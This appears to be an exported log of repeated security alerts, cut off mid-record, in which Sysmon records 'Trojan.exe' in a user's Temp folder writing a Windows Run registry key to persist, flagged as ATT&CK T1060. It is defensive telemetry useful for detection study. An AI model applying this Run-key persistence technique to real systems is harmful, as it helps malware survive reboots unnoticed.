HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:36.057247000Z"",""eventRecordID"":""1524"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:36.049\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:36.049"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:48.164",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:35.017 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:35.020292700Z"",""eventRecordID"":""1522"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:35.017\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:35.017"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:47.117",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:34.002 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:34.004832800Z"",""eventRecordID"":""1521"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:34.002\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:34.002"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:46.099",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:32.971 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:32.975047000Z"",""eventRecordID"":""1520"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:32.971\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:32.971"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:45.084",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:31.956 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:31.974800300Z"",""eventRecordID"":""1511"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:31.956\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:31.956"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:44.087",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:30.939 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:30.941294000Z"",""eventRecordID"":""1498"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:30.939\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:30.939"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:43.081",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:29.924 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:29.927102300Z"",""eventRecordID"":""1496"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:29.924\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:29.924"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:42.021",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:28.908 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:28.919034300Z"",""eventRecordID"":""1495"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:28.908\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:28.908"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:41.021",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:27.893 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:27.900850800Z"",""eventRecordID"":""1494"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:27.893\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:27.893"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:40.023",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:26.878 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:26.879105500Z"",""eventRecordID"":""1492"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:26.878\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:26.878"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:39.000",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:25.862 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:25.865294100Z"",""eventRecordID"":""1490"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:25.862\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:25.862"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:38.138",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:24.832 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: 